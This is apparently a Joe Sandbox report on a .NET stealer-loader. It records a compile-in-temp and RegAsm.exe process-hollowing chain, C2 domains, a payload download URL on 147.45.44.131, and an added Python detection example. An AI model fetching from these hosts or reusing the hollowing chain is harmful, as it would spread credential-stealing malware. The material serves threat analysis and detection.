Source: C:\Users\user\Desktop\htZgRRla8S.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A ("MZ": a whole PE image is being mapped over the suspended RegAsm.exe image base)
Source: C:\Users\user\Desktop\htZgRRla8S.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Desktop\htZgRRla8S.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\Desktop\htZgRRla8S.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43F000
Source: C:\Users\user\Desktop\htZgRRla8S.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 442000
Source: C:\Users\user\Desktop\htZgRRla8S.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000
Source: C:\Users\user\Desktop\htZgRRla8S.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 453000
Source: C:\Users\user\Desktop\htZgRRla8S.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: AED008
Source: C:\Users\user\Desktop\htZgRRla8S.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.cmdline"
Source: C:\Users\user\Desktop\htZgRRla8S.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" (no arguments; RegAsm.exe run without an assembly normally just prints its usage and exits)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4E1.tmp" "c:\Users\user\AppData\Local\Temp\qiobmurj\CSCE088865CA7FA428F90DCC973FB284B32.TMP"
Source: C:\Users\user\Desktop\htZgRRla8S.exe Queries volume information: C:\Users\user\Desktop\htZgRRla8S.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\htZgRRla8S.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
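The chain above is the classic .NET loader pattern: the sample writes a .cs file to %TEMP%, has csc.exe compile it (csc.exe in turn spawns cvtres.exe), then starts RegAsm.exe with no arguments and writes a PE image starting with "MZ" over its 0x400000 image base. The following Python is an added example written for this page, not Joe Sandbox or Sigma code, showing how those three observations become endpoint detections over Sysmon-style process-creation and remote-write events. The events are constructed to mirror this report (only PID 4144 and the command lines are taken from it; the other PIDs, the explorer.exe parent and the benign developer events are invented), and the parent allowlist and hollowing-target list are the example's assumptions to be tuned per estate.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcCreate:            # shaped like Sysmon Event ID 1
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass
class RemoteWrite:           # the sandbox's "Memory written: <target> base: ... value starts with:" observation
    src_pid: int
    dst_pid: int
    base: int
    head: bytes              # first bytes written at that base


COMPILERS = ("csc.exe", "vbc.exe")
# .NET framework utilities that malware hollows because they are signed and expected
# to live in the Framework directory (assumption: extend as needed).
HOLLOW_TARGETS = ("regasm.exe", "regsvcs.exe", "installutil.exe", "aspnet_compiler.exe")
# Parents that legitimately drive csc.exe (assumption). powershell.exe Add-Type also
# compiles from %TEMP% and is the usual tuning case; it is deliberately not listed.
DEV_PARENTS = ("devenv.exe", "msbuild.exe", "dotnet.exe", "vbcscompiler.exe")
TEMP_PATH = re.compile(r"\\appdata\\local\\temp\\|\\windows\\temp\\", re.IGNORECASE)

FW = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\"
EVENTS = [  # constructed; see lead-in
    ProcCreate(1000, 1, "C:\\Windows\\explorer.exe", "explorer.exe"),
    ProcCreate(4144, 1000, "C:\\Users\\user\\Desktop\\htZgRRla8S.exe", '"C:\\Users\\user\\Desktop\\htZgRRla8S.exe"'),
    ProcCreate(5200, 4144, FW + "csc.exe",
               f'"{FW}csc.exe" /noconfig /fullpaths @"C:\\Users\\user\\AppData\\Local\\Temp\\qiobmurj\\qiobmurj.cmdline"'),
    ProcCreate(5300, 5200, FW + "cvtres.exe",
               f'{FW}cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\\Users\\user\\AppData\\Local\\Temp\\RESA4E1.tmp"'),
    ProcCreate(5400, 4144, FW + "RegAsm.exe", f'"{FW}RegAsm.exe"'),
    RemoteWrite(4144, 5400, 0x400000, b"MZ\x90\x00"),
    # Benign developer activity that must not alert:
    ProcCreate(6000, 1000, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\devenv.exe", "devenv.exe"),
    ProcCreate(7000, 6000, FW + "csc.exe", f'"{FW}csc.exe" /noconfig @"C:\\src\\app\\obj\\Debug\\app.cmdline"'),
    ProcCreate(7100, 6000, FW + "RegAsm.exe", f'"{FW}RegAsm.exe" /codebase "C:\\src\\app\\bin\\app.dll"'),
]


def image_name(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def strip_image(cmdline: str) -> str:
    """Return the arguments of a command line, dropping the (possibly quoted) image path."""
    cl = cmdline.strip()
    if cl.startswith('"'):
        return cl[cl.find('"', 1) + 1:].strip()
    return cl.split(" ", 1)[1].strip() if " " in cl else ""


def detect(events):
    """Return (rule, pid, detail) alerts for the compile-in-temp and hollowing pattern."""
    procs = {e.pid: e for e in events if isinstance(e, ProcCreate)}
    alerts = []
    for e in events:
        if isinstance(e, ProcCreate):
            parent = procs.get(e.ppid)
            pname = image_name(parent.image) if parent else ""
            name = image_name(e.image)
            args = strip_image(e.cmdline)
            # Rule 1: a .NET compiler reading its response file from a temp directory,
            # driven by something that is not a build tool.
            if name in COMPILERS and TEMP_PATH.search(e.cmdline) and pname not in DEV_PARENTS:
                alerts.append(("dotnet_compile_from_temp", e.pid, f"{pname} -> {name} {args}"))
            # Rule 2: a hollowing target started with no arguments; on its own it would
            # only print usage, so a live instance is a container for injected code.
            if name in HOLLOW_TARGETS and args == "" and pname not in DEV_PARENTS:
                alerts.append(("dotnet_utility_without_args", e.pid, f"{pname} -> {name}"))
        else:
            # Rule 3: a PE header written by the parent into its own child.
            dst = procs.get(e.dst_pid)
            if e.head.startswith(b"MZ") and dst is not None and dst.ppid == e.src_pid:
                alerts.append(("pe_written_into_child", e.dst_pid,
                               f"base=0x{e.base:X} from pid {e.src_pid} into {image_name(dst.image)}"))
    return alerts


if __name__ == "__main__":
    for rule, pid, detail in detect(EVENTS):
        print(f"{rule:28s} pid={pid} {detail}")
```

Rule 2 is the one worth keeping even without memory telemetry: in this report RegAsm.exe is created by the sample with an empty argument list and then lives long enough to load winhttp.dll, schannel.dll and dnsapi.dll and talk to covery-mover.biz, behaviour the real RegAsm.exe never shows.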

        Stealing of Sensitive Information

Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR

        Remote Access Functionality

Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK matrix, one line per tactic, cells in the report's column order. The number the report shows in front of a technique is reproduced in parentheses; techniques without a number are the unmatched placeholders of the standard matrix.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Windows Management Instrumentation (1); Native API (1); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (411); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (31); Process Injection (411); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (31); Timestomp (1); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Security Software Discovery (1); Virtualization/Sandbox Evasion (31); System Information Discovery (22); System Network Configuration Discovery; Internet Connection Discovery; Wi-Fi Discovery; Remote System Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Screen Capture (1); Archive Collected Data (1); Clipboard Data (2); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (11); Non-Application Layer Protocol (3); Application Layer Protocol (124); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Antivirus detection, submitted sample (Source | Detection | Scanner | Label):
htZgRRla8S.exe | 55% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
htZgRRla8S.exe | 100% | Avira | HEUR/AGEN.1306918
htZgRRla8S.exe | 100% | Joe Sandbox ML

Antivirus detection, dropped files (Source | Detection | Scanner | Label):
C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.dll | 100% | Avira | HEUR/AGEN.1300034
C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.dll | 100% | Joe Sandbox ML

No Antivirus matches

Antivirus detection, domains (Source | Detection | Scanner | Label):
zinc-sneark.biz | 100% | URL Reputation | malware
dwell-exclaim.biz | 100% | URL Reputation | malware
formy-spill.biz | 100% | URL Reputation | malware

Antivirus detection, URLs (Source | Detection | Scanner | Label). Trailing characters such as "exeP", "apiQ" and "apin" are carving artifacts from memory strings, not distinct paths:
http://147.45.44.131/infopage/ung0.exeP | 0% | Avira URL Cloud | safe
https://covery-mover.biz/2 | 100% | Avira URL Cloud | malware
https://covery-mover.biz/apiQ | 100% | Avira URL Cloud | malware
https://covery-mover.biz/ | 100% | Avira URL Cloud | malware
http://147.45.44.131/infopage/ung0.exe | 0% | Avira URL Cloud | safe
http://147.45.44.131 | 0% | Avira URL Cloud | safe
https://covery-mover.biz/apin | 100% | Avira URL Cloud | malware
https://covery-mover.biz/api | 100% | Avira URL Cloud | malware
Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
covery-mover.biz | 172.67.206.64 | true | false | - | high
se-blurry.biz | unknown | unknown | false | - | high
zinc-sneark.biz | unknown | unknown | true | 100%, URL Reputation | unknown
dwell-exclaim.biz | unknown | unknown | true | 100%, URL Reputation | unknown
formy-spill.biz | unknown | unknown | true | 100%, URL Reputation | unknown

Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
https://covery-mover.biz/api | true | Avira URL Cloud: malware | unknown
dare-curbys.biz | false | - | high
impend-differ.biz | false | - | high
zinc-sneark.biz | false | - | high
covery-mover.biz | false | - | high
http://147.45.44.131/infopage/ung0.exe | true | Avira URL Cloud: safe | unknown
formy-spill.biz | false | - | high
se-blurry.biz | false | - | high
print-vexer.biz | false | - | high
dwell-exclaim.biz | false | - | high

URLs found in memory and binary data (Name | Source | Malicious | Antivirus Detection | Reputation):
https://covery-mover.biz/2 | RegAsm.exe, 00000005.00000002.2179755073.0000000000E1A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://covery-mover.biz/ | RegAsm.exe, 00000005.00000002.2179755073.0000000000E1A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://covery-mover.biz/apiQ | RegAsm.exe, 00000005.00000002.2179542666.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2179542666.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://covery-mover.biz/apin | RegAsm.exe, 00000005.00000002.2179755073.0000000000E1A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://147.45.44.131/infopage/ung0.exeP | htZgRRla8S.exe, 00000000.00000002.2139643170.0000000003031000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | htZgRRla8S.exe, 00000000.00000002.2139643170.000000000309B000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://147.45.44.131 | htZgRRla8S.exe, 00000000.00000002.2139643170.000000000309B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
147.45.44.131 | unknown | Russian Federation | 2895 | FREE-NET-AS FREEnet EU | true
172.67.206.64 | covery-mover.biz | United States | 13335 | CLOUDFLARENET US | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1574065
Start date and time: 2024-12-12 21:31:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 24s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: htZgRRla8S.exe (renamed because the original name is a hash value)
Original Sample Name: b1becdbff2a34334ae4ff5f387115ec3.exe
Detection: MAL
Classification: mal100.troj.expl.evad.winEXE@8/7@5/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 22
• Number of non-executed functions: 120
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): dllhost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: htZgRRla8S.exe
Time | Type | Description
15:32:06 | API Interceptor | 1x Sleep call for process: htZgRRla8S.exe modified
15:32:06 | API Interceptor | 6x Sleep call for process: RegAsm.exe modified
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              147.45.44.131Captcha.htaGet hashmaliciousLummaC, Cobalt Strike, HTMLPhisher, LummaC StealerBrowse
                              • 147.45.44.131/infopage/ilk.exe
                              Captcha.htaGet hashmaliciousHTMLPhisherBrowse
                              • 147.45.44.131/infopage/bgfi.ps1
                              Captcha.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LummaC StealerBrowse
                              • 147.45.44.131/infopage/ung0.exe
                              EBUdultKh7.exeGet hashmaliciousLummaC StealerBrowse
                              • 147.45.44.131/infopage/vsom.exe
                              MiJZ3z4t5K.exeGet hashmaliciousUnknownBrowse
                              • 147.45.44.131/infopage/Tom.exe
                              ZjH6H6xqo7.exeGet hashmaliciousLummaCBrowse
                              • 147.45.44.131/infopage/tvh53.exe
                              nlJ2sNaZVi.exeGet hashmaliciousLummaCBrowse
                              • 147.45.44.131/infopage/tbh75.exe
                              TZ33WZy6QL.exeGet hashmaliciousLummaCBrowse
                              • 147.45.44.131/infopage/tbg9.exe
                              7IXl1M9JGV.exeGet hashmaliciousLummaCBrowse
                              • 147.45.44.131/infopage/tbg9.exe
                              7IXl1M9JGV.exeGet hashmaliciousUnknownBrowse
                              • 147.45.44.131/infopage/bhdh552.ps1
                              172.67.206.64z3oPvgjvyN.exeGet hashmaliciousLummaC StealerBrowse
                                Captcha.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                  https://update-download.transfernow.net/dl/20240625xVCUV6maGet hashmaliciousHTMLPhisherBrowse
                                    https://link.sbstck.com/redirect/07cc7c38-01c9-45b4-adfb-583529674442?j=eyJ1IjoiM3l4NDRuIn0.hIfuke8RAzj-gbQmS59B61RAw2SA19eZRoxzpvNlDOUGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      covery-mover.bizz3oPvgjvyN.exeGet hashmaliciousLummaC StealerBrowse
                                      • 172.67.206.64
                                      Captcha.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                      • 172.67.206.64
                                      wa6qrGANga.exeGet hashmaliciousLummaC StealerBrowse
                                      • 104.21.58.186
                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                      • 104.21.58.186
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | 0TGy7VIqx7CSab5o.lNK.lnk | Get hash | malicious | Unknown | Browse | 172.67.185.252
CLOUDFLARENETUS | https://es-proposal.webflow.io/ | Get hash | malicious | HTMLPhisher | Browse | 104.21.112.1
CLOUDFLARENETUS | http://ebaumsworld.com | Get hash | malicious | Unknown | Browse | 104.17.159.113
CLOUDFLARENETUS | https://mavenclinic.quatrix.it | Get hash | malicious | Unknown | Browse | 104.18.20.58
CLOUDFLARENETUS | http://mavenclinic.quatrix.it | Get hash | malicious | Unknown | Browse | 104.18.21.58
CLOUDFLARENETUS | https://morgans-proposal-site.webflow.io/ | Get hash | malicious | Captcha Phish, HTMLPhisher | Browse | 172.64.151.8
CLOUDFLARENETUS | https://Scotts2fa.solitran.ru/JtZiK3LK/#Dmark.ochs@scotts.com | Get hash | malicious | Unknown | Browse | 104.17.25.14
CLOUDFLARENETUS | https://link.edgepilot.com/s/f30932b1/vPPKRjWXhUuvPsJT0zGKsQ?u=https://lf7oxrhbb.cc.rs6.net/tn.jsp?f=001h06J4Rg18suvxSEI1tED4DAF8iRuyxY1F6LaYcn7sb4iX7GBolUHc7ee-KUx3ocXE9JkVShRAfV1x6aenzzKcDmVc2_grDROu5C380NMdm5zgykpeK24RW4ydxOZY-zzWGqXDAcSMsLIRx7mTviOEg==%26c=rtZvyEmdrWl6DZ9XsciJKGlh47UQUNn-J3NXlYUvzX0mHT2yPp0J7g==%26ch=pbMEYYEPfkmXeu_oUdJD2iMHpz6dLW5FEUtMz_fcwAIrF1HSqrYuCA==%26__=wp-admin/wp/2XWV/Dcndx/c3Njb3R0QGRjbmR4LmNvbQ=%3D | Get hash | malicious | Outlook Phishing, HTMLPhisher | Browse | 104.18.11.207
CLOUDFLARENETUS | https://dashboard.sizle.io/p/f7c9cdf19 | Get hash | malicious | HTMLPhisher | Browse | 104.18.95.41
CLOUDFLARENETUS | 2024 Tepa LLC RFP Proposal.docx | Get hash | malicious | Unknown | Browse | 104.17.25.14
FREE-NET-ASFREEnetEU | Captcha.hta | Get hash | malicious | LummaC, Cobalt Strike, HTMLPhisher, LummaC Stealer | Browse | 147.45.44.131
FREE-NET-ASFREEnetEU | Captcha.hta | Get hash | malicious | HTMLPhisher | Browse | 147.45.44.131
FREE-NET-ASFREEnetEU | Captcha.hta | Get hash | malicious | Cobalt Strike, HTMLPhisher, LummaC Stealer | Browse | 147.45.44.131
FREE-NET-ASFREEnetEU | EBUdultKh7.exe | Get hash | malicious | LummaC Stealer | Browse | 147.45.44.131
FREE-NET-ASFREEnetEU | arm5.elf | Get hash | malicious | Unknown | Browse | 193.233.202.23
FREE-NET-ASFREEnetEU | Wh2c6sgwRo.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 147.45.47.151
FREE-NET-ASFREEnetEU | installer.exe | Get hash | malicious | Unknown | Browse | 193.233.254.0
FREE-NET-ASFREEnetEU | installer.exe | Get hash | malicious | Unknown | Browse | 193.233.254.0
FREE-NET-ASFREEnetEU | MiJZ3z4t5K.exe | Get hash | malicious | Unknown | Browse | 147.45.44.131
FREE-NET-ASFREEnetEU | tyhkamwdmrg.exe | Get hash | malicious | LummaC Stealer | Browse | 147.45.47.81
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | Get hash | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | Browse | 172.67.206.64
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | Get hash | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | Browse | 172.67.206.64
a0e9f5d64349fb13191bc781f81f42e1 | 510005940.docx.doc | Get hash | malicious | Unknown | Browse | 172.67.206.64
a0e9f5d64349fb13191bc781f81f42e1 | z3oPvgjvyN.exe | Get hash | malicious | LummaC Stealer | Browse | 172.67.206.64
a0e9f5d64349fb13191bc781f81f42e1 | Captcha.hta | Get hash | malicious | LummaC, Cobalt Strike, HTMLPhisher, LummaC Stealer | Browse | 172.67.206.64
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | Get hash | malicious | LummaC Stealer | Browse | 172.67.206.64
a0e9f5d64349fb13191bc781f81f42e1 | ZzS8KjNjr7.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer | Browse | 172.67.206.64
a0e9f5d64349fb13191bc781f81f42e1 | Szi2WJUKmv.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer | Browse | 172.67.206.64
a0e9f5d64349fb13191bc781f81f42e1 | aYxpioi6G3.exe | Get hash | malicious | LummaC | Browse | 172.67.206.64
a0e9f5d64349fb13191bc781f81f42e1 | PGkSZbFKmI.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer | Browse | 172.67.206.64
                                      No context
                                      Process:C:\Users\user\Desktop\htZgRRla8S.exe
                                      File Type:CSV text
                                      Category:dropped
                                      Size (bytes):847
                                      Entropy (8bit):5.345615485833535
                                      Encrypted:false
                                      SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                      MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                      SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                      SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                      SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                      Malicious:true
                                      Reputation:moderate, very likely benign file
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Thu Dec 12 22:22:50 2024, 1st section name ".debug$S"
                                      Category:dropped
                                      Size (bytes):1336
                                      Entropy (8bit):3.977794044893717
                                      Encrypted:false
                                      SSDEEP:24:Hvmm9p7BjHFYwKTFexmfwI+ycuZhNnakSZPNnqSSd:PZ7Bj1KTAxmo1ulna3bqSC
                                      MD5:88618807677F41A26D55B3829298FDA6
                                      SHA1:45F4D5FE273B9B853610C3158A33C46C44D06B9E
                                      SHA-256:439DD8C21E507D3CB39341A2412B89018FF19A820A8FFE9AC27793306F60672E
                                      SHA-512:F286CE4CD669584E16CC7E83E61F944842AFB33AFAF98DAA7C0C34424FAE49ACBC2DC5E04F99A633592403B891732F19D725A2E08ECC8824FF4CF2499DACCA49
                                      Malicious:false
                                      Reputation:low
                                      Preview:L...:b[g.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\qiobmurj\CSCE088865CA7FA428F90DCC973FB284B32.TMP...................8..&ZZaWVs...............5.......C:\Users\user\AppData\Local\Temp\RESA4E1.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.i.o.b.m.u.r.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.
                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                      File Type:MSVC .res
                                      Category:dropped
                                      Size (bytes):652
                                      Entropy (8bit):3.0960170624873573
                                      Encrypted:false
                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry1ak7YnqqZPN5Dlq5J:+RI+ycuZhNnakSZPNnqX
                                      MD5:D638F6C8265A5A61575673CC03DFD61E
                                      SHA1:A324532AE255224AA85F3C12402D7ACB1A664AA9
                                      SHA-256:96B9EEC1365C6301CEA72ABE5320F981C77A968F6504B31E2FF2B3FD6E5C3318
                                      SHA-512:390183B00E4B1AF605ADE28675EFE473B3B8B971974BA4E237EB1BC387CF97776EF13EF2F3FFABD1D5549BD7C5BF35DA34E94ABC7B8740673E61AE205AB22165
                                      Malicious:false
                                      Reputation:low
                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.i.o.b.m.u.r.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...q.i.o.b.m.u.r.j...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                      Process:C:\Users\user\Desktop\htZgRRla8S.exe
                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):10583
                                      Entropy (8bit):4.487855797297623
                                      Encrypted:false
                                      SSDEEP:192:eC2oTLpQgzLOoBwMw2kdl/kSpu/TuvnMHzrEx:tDLOoBol/kSpgCvMfM
                                      MD5:B022C6FE4494666C8337A975D175C726
                                      SHA1:8197D4A993E7547D19D7B067B4D28EBE48329793
                                      SHA-256:D02016A307B3E8DA1A80C29551D44C17358910816E992BC1B53DA006D62DD56A
                                      SHA-512:DF670235E87B1EE957086BE88731B458C28629E65E052276DD543BE273030986A7E5C67FA83587F68EC06FA0F33B0C3F1F041C2D06073709B340F96C3884F2B9
                                      Malicious:true
                                      Reputation:low
